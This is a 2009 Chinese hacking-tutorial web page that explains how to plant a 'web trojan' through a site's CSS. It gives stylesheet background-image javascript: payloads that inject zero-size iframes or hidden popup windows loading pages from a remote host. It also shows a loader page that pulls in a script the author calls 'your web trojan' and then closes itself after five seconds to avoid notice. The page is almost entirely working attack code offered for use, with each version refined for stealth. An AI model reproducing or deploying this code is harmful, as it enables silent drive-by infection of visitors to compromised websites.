当前位置: 首页 > 图文教程 > 网络安全 > 黑客技术 > 真正能用,还有点效果的CSS挂马代码的方法

黑客技术
全面了解ASP注入方法 [收集总结]
网站中的隐形炸弹eWebEditor文件上传漏洞补丁
Serv-U得到管理员密码新招 (转)
NET IIS暴绝对路径漏洞
超全的webshell权限提升方法
Win32 下病毒设计入门详细说明
不错的一篇玩转arp的文章
OBLOG4.0 OBLOG4.5漏洞利用分析
phpwind Exp 漏洞利用
对错误,漏洞和exploits的说明
XSS & SQL注入
如何成为一名黑客全系列说明
真正能用,还有点效果的CSS挂马代码的方法
ASP,PHP与.NET伪造HTTP-REFERER方法及防止伪造REFERER的方法
入侵oracle数据库的一些技巧
我和expression的日与被日 经典分析
mysql5 注入漏洞
rm格式插入广告代码
阿D常用的一些注入命令整理小结
Sql2005注入辅助脚本[修改版]

黑客技术 中的 真正能用,还有点效果的CSS挂马代码的方法


出处:互联网   整理: 软晨网(RuanChen.com)   发布: 2009-09-13   浏览: 96 ::
收藏到网摘: n/a

网上流行的:
body
{
background-image: url('javascript:document.write("<Iframe src=http://192.168.0.5/test.htm width=0 height=0></iframe>")')
}
//此方法会使主页不正常.返回一片空白.
用弹窗.
body
{
background-image: url('javascript:open("http://192.168.0.5/test.htm")')
}
//弹出一个框.难看 易被发现.
改进一下:
body
{
background-image: url(javascript:open('http://192.168.0.5/test.htm','newwindow','height=0, width=0, top=1000, left=0, toolbar=no, menubar=no, scrollbars=no, resizable=no,location=no, status=no'))
}
test.htm里面的代码,a.js为你的网马,弹出一个不可见的窗口,并在5秒自动后关闭没提示:
<script src="a.js"></script>
<script>
window.opener=null;setTimeout("window.close();",5000);
</script>
a.js内容:
document.write('<Iframe src="http://192.168.0.5/calc.htm"></iframe>');
请指教.